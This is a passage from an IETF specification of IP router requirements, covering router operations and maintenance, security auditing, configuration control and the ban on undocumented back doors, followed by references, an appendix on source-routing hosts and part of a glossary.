administrator. It allows the access of equipment independent of
the network connections. There are many ways to achieve this
access. Whichever one is used it is important that the access is
independent of the network connections. An example of Out-Of-Band
access would be a serial port connected to a modem that provides
dial up access to the router.

It is important that the OOB access provides the same
functionality as in-band access. In-band access, or accessing
equipment through the existing network connection, is limiting,
because most of the time, administrators need to reach equipment
to figure out why it is unreachable. In band access is still very
important for configuring a router, and for troubleshooting more
subtle problems.

10.3.2 Router O&M Functions

10.3.2.1 Maintenance - Hardware Diagnosis

Each router SHOULD operate as a stand-alone device for the purposes
of local hardware maintenance. Means SHOULD be available to run
diagnostic programs at the router site using only on-site tools. A
router SHOULD be able to run diagnostics in case of a fault. For
suggested hardware and software diagnostics see Section [10.3.3].

10.3.2.2 Control - Dumping and Rebooting

A router MUST include both in-band and out-of-band mechanisms to
allow the network manager to reload, stop, and restart the router. A
router SHOULD also contain a mechanism (such as a watchdog timer)
which will reboot the router automatically if it hangs due to a
software or hardware fault.

A router SHOULD IMPLEMENT a mechanism for dumping the contents of a
router's memory (and/or other state useful for vendor debugging after
a crash), and either saving them on a stable storage device local to

the router or saving them on another host via an up-line dump
mechanism such as TFTP (see [OPER:2], [INTRO:3]).

10.3.2.3 Control - Configuring the Router

Every router has configuration parameters that may need to be set.
It SHOULD be possible to update the parameters without rebooting the
router; at worst, a restart MAY be required. There may be cases when
it is not possible to change parameters without rebooting the router
(for instance, changing the IP address of an interface). In these
cases, care should be taken to minimize disruption to the router and
the surrounding network.

There SHOULD be a way to configure the router over the network either
manually or automatically. A router SHOULD be able to upload or
download its parameters from a host or another router. A means
SHOULD be provided, either as an application program or a router
function, to convert between the parameter format and a human-
editable format. A router SHOULD have some sort of stable storage
for its configuration. A router SHOULD NOT believe protocols such as
RARP, ICMP Address Mask Reply, and MAY not believe BOOTP.

DISCUSSION
It is necessary to note here that in the future RARP, ICMP Address
Mask Reply, BOOTP and other mechanisms may be needed to allow a
router to auto-configure. Although routers may in the future be
able to configure automatically, the intent here is to discourage
this practice in a production environment until auto-configuration
has been tested more thoroughly. The intent is NOT to discourage
auto-configuration all together. In cases where a router is
expected to get its configuration automatically it may be wise to
allow the router to believe these things as it comes up and then
ignore them after it has gotten its configuration.

10.3.2.4 Net Booting of System Software

A router SHOULD keep its system image in local non-volatile
storage such as PROM, NVRAM, or disk. It MAY also be able to load
its system software over the network from a host or another
router.

A router that can keep its system image in local non-volatile
storage MAY be configurable to boot its system image over the
network. A router that offers this option SHOULD be configurable
to boot the system image in its non-volatile local storage if it
is unable to boot its system image over the network.

DISCUSSION
It is important that the router be able to come up and run on its
own. NVRAM may be a particular solution for routers used in large
networks, since changing PROMs can be quite time consuming for a
network manager responsible for numerous or geographically
dispersed routers. It is important to be able to netboot the
system image because there should be an easy way for a router to
get a bug fix or new feature more quickly than getting PROMs
installed. Also if the router has NVRAM instead of PROMs, it will
netboot the image and then put it in NVRAM.

Routers SHOULD perform some basic consistency check on any image
loaded, to detect and perhaps prevent incorrect images.

A router MAY also be able to distinguish between different
configurations based on which software it is running. If
configuration commands change from one software version to another,
it would be helpful if the router could use the configuration that
was compatible with the software.

10.3.2.5 Detecting and responding to misconfiguration

There MUST be mechanisms for detecting and responding to
misconfigurations. If a command is executed incorrectly, the router
SHOULD give an error message. The router SHOULD NOT accept a poorly
formed command as if it were correct.

DISCUSSION
There are cases where it is not possible to detect errors: the
command is correctly formed, but incorrect with respect to the
network. This may be detected by the router, but may not be
possible.

Another form of misconfiguration is misconfiguration of the network
to which the router is attached. A router MAY detect
misconfigurations in the network. The router MAY log these findings
to a file, either on the router or a host, so that the network
manager will see that there are possible problems on the network.

DISCUSSION
Examples of such misconfigurations might be another router with
the same address as the one in question or a router with the wrong
address mask. If a router detects such problems it is probably
not the best idea for the router to try to fix the situation.
That could cause more harm than good.

10.3.2.6 Minimizing Disruption

Changing the configuration of a router SHOULD have minimal affect on
the network. Routing tables SHOULD NOT be unnecessarily flushed when
a simple change is made to the router. If a router is running
several routing protocols, stopping one routing protocol SHOULD NOT
disrupt other routing protocols, except in the case where one network
is learned by more than one routing protocol.

DISCUSSION
It is the goal of a network manager to run a network so that users
of the network get the best connectivity possible. Reloading a
router for simple configuration changes can cause disruptions in
routing and ultimately cause disruptions to the network and its
users. If routing tables are unnecessarily flushed, for instance,
the default route will be lost as well as specific routes to sites
within the network. This sort of disruption will cause
significant downtime for the users. It is the purpose of this
section to point out that whenever possible, these disruptions
should be avoided.

10.3.2.7 Control - Troubleshooting Problems

(1) A router MUST provide in-band network access, but (except as
required by Section [8.2]) for security considerations this
access SHOULD be disabled by default. Vendors MUST document
the default state of any in-band access. This access SHOULD
implement access controls, to prevent unauthorized access.

DISCUSSION
In-band access primarily refers to access through the normal
network protocols that may or may not affect the permanent
operational state of the router. This includes, but is not
limited to Telnet/RLOGIN console access and SNMP operations.

This was a point of contention between the operational out of the
box and secure out of The box contingents. Any automagic access
to the router may introduce insecurities, but it may be more
important for the customer to have a router that is accessible
over the network as soon as it is plugged in. At least one vendor
supplies routers without any external console access and depends
on being able to access the router through the network to complete
its configuration.

It is the vendors call whether in-band access is enabled by
default; but it is also the vendor's responsibility to make its
customers aware of possible insecurities.

(2) A router MUST provide the ability to initiate an ICMP echo.
The following options SHOULD be implemented:

o Choice of data patterns

o Choice of packet size

o Record route

and the following additional options MAY be implemented:

o Loose source route

o Strict source route

o Timestamps

(3) A router SHOULD provide the ability to initiate a traceroute.
If traceroute is provided, then the 3rd party traceroute
SHOULD be implemented.

Each of the above three facilities (if implemented) SHOULD have
access restrictions placed on it to prevent its abuse by unauthorized
persons.

10.4 Security Considerations

10.4.1 Auditing and Audit Trails

Auditing and billing are the bane of the network operator, but are
the two features most requested by those in charge of network
security and those who are responsible for paying the bills. In the
context of security, auditing is desirable if it helps you keep your
network working and protects your resources from abuse, without
costing you more than those resources are worth.

(1) Configuration Changes

Router SHOULD provide a method for auditing a configuration
change of a router, even if it's something as simple as
recording the operator's initials and time of change.

DISCUSSION
Configuration change logging (who made a configuration change,
what was changed, and when) is very useful, especially when
traffic is suddenly routed through Alaska on its way across town.
So is the ability to revert to a previous configuration.

(2) Packet Accounting

Vendors should strongly consider providing a system for
tracking traffic levels between pairs of hosts or networks.
A mechanism for limiting the collection of this information
to specific pairs of hosts or networks is also strongly
encouraged.

DISCUSSION
A host traffic matrix as described above can give the network
operator a glimpse of traffic trends not apparent from other
statistics. It can also identify hosts or networks that are
probing the structure of the attached networks - e.g., a single
external host that tries to send packets to every IP address in
the network address range for a connected network.

(3) Security Auditing

Routers MUST provide a method for auditing security related
failures or violations to include:

o Authorization Failures: bad passwords, invalid SNMP
communities, invalid authorization tokens,

o Violations of Policy Controls: Prohibited Source Routes,
Filtered Destinations, and

o Authorization Approvals: good passwords - Telnet in-band
access, console access.

Routers MUST provide a method of limiting or disabling such
auditing but auditing SHOULD be on by default. Possible
methods for auditing include listing violations to a console
if present, logging or counting them internally, or logging
them to a remote security server through the SNMP trap
mechanism or the Unix logging mechanism as appropriate. A
router MUST implement at least one of these reporting
mechanisms - it MAY implement more than one.

10.4.2 Configuration Control

A vendor has a responsibility to use good configuration control
practices in the creation of the software/firmware loads for their
routers. In particular, if a vendor makes updates and loads
available for retrieval over the Internet, the vendor should also
provide a way for the customer to confirm the load is a valid one,
perhaps by the verification of a checksum over the load.

DISCUSSION
Many vendors currently provide short notice updates of their
software products through the Internet. This a good trend and
should be encouraged, but provides a point of vulnerability in the
configuration control process.

If a vendor provides the ability for the customer to change the
configuration parameters of a router remotely, for example through a
Telnet session, the ability to do so SHOULD be configurable and
SHOULD default to off. The router SHOULD require valid
authentication before permitting remote reconfiguration. This
authentication procedure SHOULD NOT transmit the authentication
secret over the network. For example, if telnet is implemented, the
vendor SHOULD IMPLEMENT Kerberos, S-Key, or a similar authentication
procedure.

DISCUSSION
Allowing your properly identified network operator to twiddle with
your routers is necessary; allowing anyone else to do so is
foolhardy.

A router MUST NOT have undocumented back door access and master
passwords. A vendor MUST ensure any such access added for purposes
of debugging or product development are deleted before the product is
distributed to its customers.

DISCUSSION
A vendor has a responsibility to its customers to ensure they are
aware of the vulnerabilities present in its code by intention -
e.g., in-band access. Trap doors, back doors and master passwords
intentional or unintentional can turn a relatively secure router
into a major problem on an operational network. The supposed
operational benefits are not matched by the potential problems.

11. REFERENCES

Implementors should be aware that Internet protocol standards are
occasionally updated. These references are current as of this
writing, but a cautious implementor will always check a recent
version of the RFC index to ensure that an RFC has not been updated
or superseded by another, more recent RFC. Reference [INTRO:6]
explains various ways to obtain a current RFC index.

APPL:1.
Croft, B., and J. Gilmore, "Bootstrap Protocol (BOOTP)", RFC
951, Stanford University, Sun Microsystems, September 1985.

APPL:2.
Alexander, S., and R. Droms, "DHCP Options and BOOTP Vendor
Extensions", RFC 1533, Lachman Technology, Inc., Bucknell
University, October 1993.

APPL:3.
Wimer, W., "Clarifications and Extensions for the Bootstrap
Protocol", RFC 1542, Carnegie Mellon University, October 1993.

ARCH:1.
DDN Protocol Handbook, NIC-50004, NIC-50005, NIC-50006 (three
volumes), DDN Network Information Center, SRI International,
Menlo Park, California, USA, December 1985.

ARCH:2.
V. Cerf and R. Kahn, "A Protocol for Packet Network
Intercommunication", IEEE Transactions on Communication, May
1974. Also included in [ARCH:1].

ARCH:3.
J. Postel, C. Sunshine, and D. Cohen, "The ARPA Internet
Protocol", Computer Networks, volume 5, number 4, July 1981.
Also included in [ARCH:1].

ARCH:4.
B. Leiner, J. Postel, R. Cole, and D. Mills, :The DARPA
Internet Protocol Suite", Proceedings of INFOCOM '85, IEEE,
Washington, DC, March 1985. Also in: IEEE Communications
Magazine, March 1985. Also available from the Information
Sciences Institute, University of Southern California as
Technical Report ISI-RS-85-153.

ARCH:5.
D. Comer, "Internetworking With TCP/IP Volume 1: Principles,
Protocols, and Architecture", Prentice Hall, Englewood Cliffs,
NJ, 1991.

ARCH:6.
W. Stallings, "Handbook of Computer-Communications Standards
Volume 3: The TCP/IP Protocol Suite", Macmillan, New York, NY,
1990.

ARCH:7.
Postel, J., "Internet Official Protocol Standards", STD 1, RFC
1780, Internet Architecture Board, March 1995.

ARCH:8.
Information processing systems - Open Systems Interconnection -
Basic Reference Model, ISO 7489, International Standards
Organization, 1984.

ARCH:9
R. Braden, J. Postel, Y. Rekhter, "Internet Architecture
Extensions for Shared Media", 05/20/1994

FORWARD:1.
IETF CIP Working Group (C. Topolcic, Editor), "Experimental
Internet Stream Protocol", Version 2 (ST-II), RFC 1190, October
1990.

FORWARD:2.
Mankin, A., and K. Ramakrishnan, Editors, "Gateway Congestion
Control Survey", RFC 1254, MITRE, Digital Equipment Corporation,
August 1991.

FORWARD:3.
J. Nagle, "On Packet Switches with Infinite Storage", IEEE
Transactions on Communications, volume COM-35, number 4, April
1987.

FORWARD:4.
R. Jain, K. Ramakrishnan, and D. Chiu, "Congestion Avoidance
in Computer Networks With a Connectionless Network Layer",
Technical Report DEC-TR-506, Digital Equipment Corporation.

FORWARD:5.
V. Jacobson, "Congestion Avoidance and Control", Proceedings of
SIGCOMM '88, Association for Computing Machinery, August 1988.

FORWARD:6.
W. Barns, "Precedence and Priority Access Implementation for
Department of Defense Data Networks", Technical Report MTR-
91W00029, The Mitre Corporation, McLean, Virginia, USA, July
1991.

FORWARD:7
Fang, Chen, Hutchins, "Simulation Results of TCP Performance
over ATM with and without Flow Control", presentation to the ATM
Forum, November 15, 1993.

FORWARD:8
V. Paxson, S. Floyd "Wide Area Traffic: the Failure of Poisson
Modeling", short version in SIGCOMM '94.

FORWARD:9
Leland, Taqqu, Willinger and Wilson, "On the Self-Similar Nature
of Ethernet Traffic", Proceedings of SIGCOMM '93, September,
1993.

FORWARD:10
S. Keshav "A Control Theoretic Approach to Flow Control",
SIGCOMM 91, pages 3-16

FORWARD:11
K.K. Ramakrishnan and R. Jain, "A Binary Feedback Scheme for
Congestion Avoidance in Computer Networks", ACM Transactions of
Computer Systems, volume 8, number 2, 1980.

FORWARD:12
H. Kanakia, P. Mishara, and A. Reibman]. "An adaptive
congestion control scheme for real-time packet video transport",
In Proceedings of ACM SIGCOMM 1994, pages 20-31, San Francisco,
California, September 1993.

FORWARD:13
A. Demers, S. Keshav, S. Shenker, "Analysis and Simulation of
a Fair Queuing Algorithm",
93 pages 1-12

FORWARD:14
Clark, D., Shenker, S., and L. Zhang, "Supporting Real-Time
Applications in an Integrated Services Packet Network:
Architecture and Mechanism", 92 pages 14-26

INTERNET:1.
Postel, J., "Internet Protocol", STD 5, RFC 791, USC/Information
Sciences Institute, September 1981.

INTERNET:2.
Mogul, J., and J. Postel, "Internet Standard Subnetting
Procedure", STD 5, RFC 950, Stanford, USC/Information Sciences
Institute, August 1985.

INTERNET:3.
Mogul, J., "Broadcasting Internet Datagrams in the Presence of
Subnets", STD 5, RFC 922, Stanford University, October 1984.

INTERNET:4.
Deering, S., "Host Extensions for IP Multicasting", STD 5, RFC
1112, Stanford University, August 1989.

INTERNET:5.
Kent, S., "U.S. Department of Defense Security Options for the
Internet Protocol", RFC 1108, BBN Communications, November 1991.

INTERNET:6.
Braden, R., Borman, D., and C. Partridge, "Computing the
Internet Checksum", RFC 1071, USC/Information Sciences
Institute, Cray Research, BBN Communications, September 1988.

INTERNET:7.
Mallory T., and A. Kullberg, "Incremental Updating of the
Internet Checksum", RFC 1141, BBN Communications, January 1990.

INTERNET:8.
Postel, J., "Internet Control Message Protocol", STD 5, RFC 792,
USC/Information Sciences Institute, September 1981.

INTERNET:9.
A. Mankin, G. Hollingsworth, G. Reichlen, K. Thompson, R.
Wilder, and R. Zahavi, "Evaluation of Internet Performance -
FY89", Technical Report MTR-89W00216, MITRE Corporation,
February, 1990.

INTERNET:10.
G. Finn, A "Connectionless Congestion Control Algorithm",
Computer Communications Review, volume 19, number 5, Association
for Computing Machinery, October 1989.

INTERNET:11.
Prue, W., and J. Postel, "The Source Quench Introduced Delay
(SQuID)", RFC 1016, USC/Information Sciences Institute, August
1987.

INTERNET:12.
McKenzie, A., "Some comments on SQuID", RFC 1018, BBN Labs,
August 1987.

INTERNET:13.
Deering, S., "ICMP Router Discovery Messages", RFC 1256, Xerox
PARC, September 1991.

INTERNET:14.
Mogul J., and S. Deering, "Path MTU Discovery", RFC 1191,
DECWRL, Stanford University, November 1990.

INTERNET:15
Fuller, V., Li, T., Yu, J., and K. Varadhan, "Classless Inter-
Domain Routing (CIDR): an Address Assignment and Aggregation
Strategy" RFC 1519, BARRNet, cisco, Merit, OARnet, September
1993.

INTERNET:16
St. Johns, M., "Draft Revised IP Security Option", RFC 1038,
IETF, January 1988.

INTERNET:17
Prue, W., and J. Postel, "Queuing Algorithm to Provide Type-
of-service For IP Links", RFC 1046, USC/Information Sciences
Institute, February 1988.

INTERNET:18
Postel, J., "Address Mappings", RFC 796, USC/Information
Sciences Institute, September 1981.

INTRO:1.
Braden, R., and J. Postel, "Requirements for Internet
Gateways", STD 4, RFC 1009, USC/Information Sciences Institute,
June 1987.

INTRO:2.
Internet Engineering Task Force (R. Braden, Editor),
"Requirements for Internet Hosts - Communication Layers", STD 3,
RFC 1122, USC/Information Sciences Institute, October 1989.

INTRO:3.
Internet Engineering Task Force (R. Braden, Editor),
"Requirements for Internet Hosts - Application and Support", STD
3, RFC 1123, USC/Information Sciences Institute, October 1989.

INTRO:4.
Clark, D., "Modularity and Efficiency in Protocol
Implementations", RFC 817, MIT Laboratory for Computer Science,
July 1982.

INTRO:5.
Clark, D., "The Structuring of Systems Using Upcalls",
Proceedings of 10th ACM SOSP, December 1985.

INTRO:6.
Jacobsen, O., and J. Postel, "Protocol Document Order
Information", RFC 980, SRI, USC/Information Sciences Institute,
March 1986.

INTRO:7.
Reynolds, J., and J. Postel, "Assigned Numbers", STD 2, RFC
1700, USC/Information Sciences Institute, October 1994. This
document is periodically updated and reissued with a new number.
It is wise to verify occasionally that the version you have is
still current.

INTRO:8.
DoD Trusted Computer System Evaluation Criteria, DoD publication
5200.28-STD, U.S. Department of Defense, December 1985.

INTRO:9
Malkin, G., and T. LaQuey Parker, Editors, "Internet Users'
Glossary", FYI 18, RFC 1392, Xylogics, Inc., UTexas, January
1993.

LINK:1.
Leffler, S., and M. Karels, "Trailer Encapsulations", RFC 893,
University of California at Berkeley, April 1984.

LINK:2
Simpson, W., "The Point-to-Point Protocol (PPP)", STD 51, RFC
1661, Daydreamer July 1994.

LINK:3
McGregor, G., "The PPP Internet Protocol Control Protocol
(IPCP)", RFC 1332, Merit May 1992.

LINK:4
Lloyd, B., and W. Simpson, "PPP Authentication Protocols", RFC
1334, L&A, Daydreamer, May 1992.

LINK:5
Simpson, W., "PPP Link Quality Monitoring", RFC 1333,
Daydreamer, May 1992.

MGT:1.
Rose, M., and K. McCloghrie, "Structure and Identification of
Management Information of TCP/IP-based Internets", STD 16, RFC
1155, Performance Systems International, Hughes LAN Systems, May
1990.

MGT:2.
McCloghrie, K., and M. Rose (Editors), "Management Information
Base of TCP/IP-Based Internets: MIB-II", STD 16, RFC 1213,
Hughes LAN Systems, Inc., Performance Systems International,
March 1991.

MGT:3.
Case, J., Fedor, M., Schoffstall, M., and J. Davin, "Simple
Network Management Protocol", STD 15, RFC 1157, SNMP Research,
Performance Systems International, MIT Laboratory for Computer
Science, May 1990.

MGT:4.
Rose, M., and K. McCloghrie (Editors), "Towards Concise MIB
Definitions", STD 16, RFC 1212, Performance Systems
International, Hughes LAN Systems, March 1991.

MGT:5.
Steinberg, L., "Techniques for Managing Asynchronously Generated
Alerts", RFC 1224, IBM Corporation, May 1991.

MGT:6.
Kastenholz, F., "Definitions of Managed Objects for the
Ethernet-like Interface Types", RFC 1398, FTP Software, Inc.,
January 1993.

MGT:7.
McCloghrie, K., and R. Fox "IEEE 802.4 Token Bus MIB", RFC 1230,
Hughes LAN Systems, Inc., Synoptics, Inc., May 1991.

MGT:8.
McCloghrie, K., Fox R., and E. Decker, "IEEE 802.5 Token Ring
MIB", RFC 1231, Hughes LAN Systems, Inc., Synoptics, Inc., cisco
Systems, Inc., February 1993.

MGT:9.
Case, J., and A. Rijsinghani, "FDDI Management Information
Base", RFC 1512, The University of Tennesse and SNMP Research,
Digital Equipment Corporation, September 1993.

MGT:10.
Stewart, B., Editor "Definitions of Managed Objects for RS-232-
like Hardware Devices", RFC 1317, Xyplex, Inc., April 1992.

MGT:11.
Kastenholz, F., "Definitions of Managed Objects for the Link
Control Protocol of the Point-to-Point Protocol", RFC 1471, FTP
Software, Inc., June 1992.

MGT:12.
Kastenholz, F., "The Definitions of Managed Objects for the
Security Protocols of the Point-to-Point Protocol", RFC 1472,
FTP Software, Inc., June 1992.

MGT:13.
Kastenholz, F., "The Definitions of Managed Objects for the IP
Network Control Protocol of the Point-to-Point Protocol", RFC
1473, FTP Software, Inc., June 1992.

MGT:14.
Baker, F., and R. Coltun, "OSPF Version 2 Management
Information Base", RFC 1253, ACC, Computer Science Center,
August 1991.

MGT:15.
Willis, S., and J. Burruss, "Definitions of Managed Objects for
the Border Gateway Protocol (Version 3)", RFC 1269, Wellfleet
Communications Inc., October 1991.

MGT:16.
Baker, F., and J. Watt, "Definitions of Managed Objects for the
DS1 and E1 Interface Types", RFC 1406, Advanced Computer
Communications, Newbridge Networks Corporation, January 1993.

MGT:17.
Cox, T., and K. Tesink, Editors "Definitions of Managed Objects
for the DS3/E3 Interface Types", RFC 1407, Bell Communications
Research, January 1993.

MGT:18.
McCloghrie, K., "Extensions to the Generic-Interface MIB", RFC
1229, Hughes LAN Systems, August 1992.

MGT:19.
Cox, T., and K. Tesink, "Definitions of Managed Objects for the
SIP Interface Type", RFC 1304, Bell Communications Research,
February 1992.

MGT:20
Baker, F., "IP Forwarding Table MIB", RFC 1354, ACC, July 1992.

MGT:21.
Malkin, G., and F. Baker, "RIP Version 2 MIB Extension", RFC
1724, Xylogics, Inc., Cisco Systems, November 1994

MGT:22.
Throop, D., "SNMP MIB Extension for the X.25 Packet Layer", RFC
1382, Data General Corporation, November 1992.

MGT:23.
Throop, D., and F. Baker, "SNMP MIB Extension for X.25 LAPB",
RFC 1381, Data General Corporation, ACC, November 1992.

MGT:24.
Throop, D., and F. Baker, "SNMP MIB Extension for MultiProtocol
Interconnect over X.25", RFC 1461, Data General Corporation, May
1993.

MGT:25.
Rose, M., "SNMP over OSI", RFC 1418, Dover Beach Consulting,
Inc., March 1993.

MGT:26.
Minshall, G., and M. Ritter, "SNMP over AppleTalk", RFC 1419,
Novell, Inc., Apple Computer, Inc., March 1993.

MGT:27.
Bostock, S., "SNMP over IPX", RFC 1420, Novell, Inc., March
1993.

MGT:28.
Schoffstall, M., Davin, C., Fedor, M., and J. Case, "SNMP over
Ethernet", RFC 1089, Rensselaer Polytechnic Institute, MIT
Laboratory for Computer Science, NYSERNet, Inc., University of
Tennessee at Knoxville, February 1989.

MGT:29.
Case, J., "FDDI Management Information Base", RFC 1285, SNMP
Research, Incorporated, January 1992.

OPER:1.
Nagle, J., "Congestion Control in IP/TCP Internetworks", RFC
896, FACC, January 1984.

OPER:2.
Sollins, K., "TFTP Protocol (revision 2)", RFC 1350, MIT, July
1992.

ROUTE:1.
Moy, J., "OSPF Version 2", RFC 1583, Proteon, March 1994.

ROUTE:2.
Callon, R., "Use of OSI IS-IS for Routing in TCP/IP and Dual
Environments", RFC 1195, DEC, December 1990.

ROUTE:3.
Hedrick, C., "Routing Information Protocol", RFC 1058, Rutgers
University, June 1988.

ROUTE:4.
Lougheed, K., and Y. Rekhter, "A Border Gateway Protocol 3
(BGP-3)", RFC 1267, cisco, T.J. Watson Research Center, IBM
Corp., October 1991.

ROUTE:5.
Gross, P, and Y. Rekhter, "Application of the Border Gateway
Protocol in the Internet", RFC 1772, T.J. Watson Research
Center, IBM Corp., MCI, March 1995.

ROUTE:6.
Mills, D., "Exterior Gateway Protocol Formal Specification", RFC
904, UDEL, April 1984.

ROUTE:7.
Rosen, E., "Exterior Gateway Protocol (EGP)", RFC 827, BBN,
October 1982.

ROUTE:8.
Seamonson, L, and E. Rosen, "STUB" "Exterior Gateway Protocol",
RFC 888, BBN, January 1984.

ROUTE:9.
Waitzman, D., Partridge, C., and S. Deering, "Distance Vector
Multicast Routing Protocol", RFC 1075, BBN, Stanford, November
1988.

ROUTE:10.
Deering, S., Multicast Routing in Internetworks and Extended
LANs, Proceedings of '88, Association for Computing Machinery,
August 1988.

ROUTE:11.
Almquist, P., "Type of Service in the Internet Protocol Suite",
RFC 1349, Consultant, July 1992.

ROUTE:12.
Rekhter, Y., "Experience with the BGP Protocol", RFC 1266, T.J.
Watson Research Center, IBM Corp., October 1991.

ROUTE:13.
Rekhter, Y., "BGP Protocol Analysis", RFC 1265, T.J. Watson
Research Center, IBM Corp., October 1991.

TRANS:1.
Postel, J., "User Datagram Protocol", STD 6, RFC 768,
USC/Information Sciences Institute, August 1980.

TRANS:2.
Postel, J., "Transmission Control Protocol", STD 7, RFC 793,
USC/Information Sciences Institute, September 1981.

APPENDIX A. REQUIREMENTS FOR SOURCE-ROUTING HOSTS

Subject to restrictions given below, a host MAY be able to act as an
intermediate hop in a source route, forwarding a source-routed
datagram to the next specified hop.

However, in performing this router-like function, the host MUST obey
all the relevant rules for a router forwarding source-routed
datagrams [INTRO:2]. This includes the following specific
provisions:

(A) TTL
The TTL field MUST be decremented and the datagram perhaps
discarded as specified for a router in [INTRO:2].

(B) ICMP Destination Unreachable
A host MUST be able to generate Destination Unreachable messages
with the following codes:
4 (Fragmentation Required but DF Set) when a source-routed
datagram cannot be fragmented to fit into the target network;
5 (Source Route Failed) when a source-routed datagram cannot be
forwarded, e.g., because of a routing problem or because the
next hop of a strict source route is not on a connected
network.

(C) IP Source Address
A source-routed datagram being forwarded MAY (and normally will)
have a source address that is not one of the IP addresses of the
forwarding host.

(D) Record Route Option
A host that is forwarding a source-routed datagram containing a
Record Route option MUST update that option, if it has room.

(E) Timestamp Option
A host that is forwarding a source-routed datagram containing a
Timestamp Option MUST add the current timestamp to that option,
according to the rules for this option.

To define the rules restricting host forwarding of source-routed
datagrams, we use the term local source-routing if the next hop will
be through the same physical interface through which the datagram
arrived; otherwise, it is non-local source-routing.

A host is permitted to perform local source-routing without
restriction.

A host that supports non-local source-routing MUST have a
configurable switch to disable forwarding, and this switch MUST
default to disabled.

The host MUST satisfy all router requirements for configurable policy
filters [INTRO:2] restricting non-local forwarding.

If a host receives a datagram with an incomplete source route but
does not forward it for some reason, the host SHOULD return an ICMP
Destination Unreachable (code 5, Source Route Failed) message, unless
the datagram was itself an ICMP error message.

APPENDIX B. GLOSSARY

This Appendix defines specific terms used in this memo. It also
defines some general purpose terms that may be of interest. See also
[INTRO:9] for a more general set of definitions.

Autonomous System (AS)
An Autonomous System (AS) is a connected segment of a network
topology that consists of a collection of subnetworks (with
hosts attached) interconnected by a set of routes. The
subnetworks and the routers are expected to be under the control
of a single operations and maintenance (O&M) organization.
Within an AS routers may use one or more interior routing
protocols, and sometimes several sets of metrics. An AS is
expected to present to other ASs an appearence of a coherent
interior routing plan, and a consistent picture of the
destinations reachable through the AS. An AS is identified by
an Autonomous System number.
Connected Network
A network prefix to which a router is interfaced is often known
as a local network or the subnetwork of that router. However,
these terms can cause confusion, and therefore we use the term
Connected Network in this memo.

Connected (Sub)Network
A Connected (Sub)Network is an IP subnetwork to which a router
is interfaced, or a connected network if the connected network
is not subnetted. See also Connected Network.

Datagram
The unit transmitted between a pair of internet modules. Data,
called datagrams, from sources to destinations. The Internet
Protocol does not provide a reliable communication facility.
There are no acknowledgments either end-to-end or hop-by-hop.
There is no error no retransmissions. There is no flow control.
See IP.

Default Route
A routing table entry that is used to direct any data addressed
to any network prefixes not explicitly listed in the routing
table.

Dense Mode
In multicast forwarding, two paradigms are possible: in Dense
Mode forwarding, a network multicast is forwarded as a data link
layer multicast to all interfaces except that on which it was
received, unless and until the router is instructed not to by a
multicast routing neighbor. See Sparse Mode.

EGP
Exterior Gateway Protocol A protocol that distributes routing
information to the gateways (routers) which connect autonomous
systems. See IGP.

EGP-2
Exterior Gateway Protocol version 2 This is an EGP routing
protocol developed to handle traffic between Autonomous Systems
in the Internet.

Forwarder
The logical entity within a router that is responsible for
switching packets among the router's interfaces. The Forwarder
also makes the decisions to queue a packet for local delivery,
to queue a packet for transmission out another interface, or
both.

Forwarding
Forwarding is the process a router goes through for each packet
received by the router. The packet may be consumed by the
router, it may be output on one or more interfaces of the
router, or both. Forwarding includes the process of deciding
what to do with the packet as well as queuing it up for
(possible) output or internal consumption.

Forwarding Information Base (FIB)
The table containing the information necessary to forward IP
Datagrams, in this document, is called the Forwarding
Information Base. At minimum, this contains the interface
identifier and next hop information for each reachable
destination network prefix.

Fragment
An IP datagram that represents a portion of a higher layer's
packet that was too large to be sent in its entirety over the
output network.

General Purpose Serial Interface
A physical medium capable of connecting exactly two systems, and
therefore configurable as a point to point line, but also
configurable to support link layer networking using protocols
such as X.25 or Frame Relay. A link layer network connects
another system to a switch, and a higher communication layer
multiplexes virtual circuits on the connection. See Point to
Point Line.

IGP
Interior Gateway Protocol A protocol that distributes routing
information with an Autonomous System (AS). See EGP.

Interface IP Address
The IP Address and network prefix length that is assigned to a
specific interface of a router.

Internet Address
An assigned number that identifies a host in an internet. It
has two parts: an IP address and a prefix length. The prefix
length indicates how many of the most specific bits of the
address constitute the network prefix.

IP
Internet Protocol The network layer protocol for the Internet.
It is a packet switching, datagram protocol defined in RFC 791.
IP does not provide a reliable communications facility; that is,
there are no end-to-end of hop-by-hop acknowledgments.

IP Datagram
An IP Datagram is the unit of end-to-end transmission in the
Internet Protocol. An IP Datagram consists of an IP header
followed by all of higher-layer data (such as TCP, UDP, ICMP,
and the like). An IP Datagram is an IP header followed by a
message.

An IP Datagram is a complete IP end-to-end transmission unit.
An IP Datagram is composed of one or more IP Fragments.

In this memo, the unqualified term Datagram should be understood
to refer to an IP Datagram.

IP Fragment
An IP Fragment is a component of an IP Datagram. An IP Fragment
consists of an IP header followed by all or part of the higher-
layer of the original IP Datagram.

One or more IP Fragments comprises a single IP Datagram.

In this memo, the unqualified term Fragment should be understood
to refer to an IP Fragment.

IP Packet
An IP Datagram or an IP Fragment.

In this memo, the unqualified term Packet should generally be
understood to refer to an IP Packet.

Logical [network] interface
We define a logical [network] interface to be a logical path,
distinguished by a unique IP address, to a connected network.

Martian Filtering
A packet that contains an invalid source or destination address
is considered to be martian and discarded.

MTU (Maximum Transmission Unit)
The size of the largest packet that can be transmitted or
received through a logical interface. This size includes the IP
header but does not include the size of any Link Layer headers
or framing.

Multicast
A packet that is destined for multiple hosts. See broadcast.

Multicast Address
A special type of address that is recognizable by multiple
hosts.

A Multicast Address is sometimes known as a Functional Address
or a Group Address.

Network Prefix
The portion of an IP Address that signifies a set of systems.
It is selected from the IP Address by logically ANDing a subnet
mask with the address, or (equivalently) setting the bits of the
address not among the most significant bits of
the address to zero.

Originate
Packets can be transmitted by a router for one of two reasons:
1) the packet was received and is being forwarded or 2) the
router itself created the packet for transmission (such as route
advertisements). Packets that the router creates for
transmission are said to originate at the router.

Packet
A packet is the unit of data passed across the interface between
the Internet Layer and the Link Layer. It includes an IP header
and data. A packet may be a complete IP datagram or a fragment
of an IP datagram.

Path
The sequence of routers and (sub-)networks that a packet
traverses from a particular router to a particular destination
host. Note that a path is uni-directional; it is not unusual to
have different paths in the two directions between a given host
pair.

Physical Network
A Physical Network is a network (or a piece of an internet)
which is contiguous at the Link Layer. Its internal structure
(if any) is transparent to the Internet Layer.

In this memo, several media components that are connected using
devices such as bridges or repeaters are considered to be a
single Physical Network since such devices are transparent to
the IP.

Physical Network Interface
This is a physical interface to a Connected Network and has a
(possibly unique) Link-Layer address. Multiple Physical Network
Interfaces on a single router may share the same Link-Layer
address, but the address must be unique for different routers on
the same Physical Network.

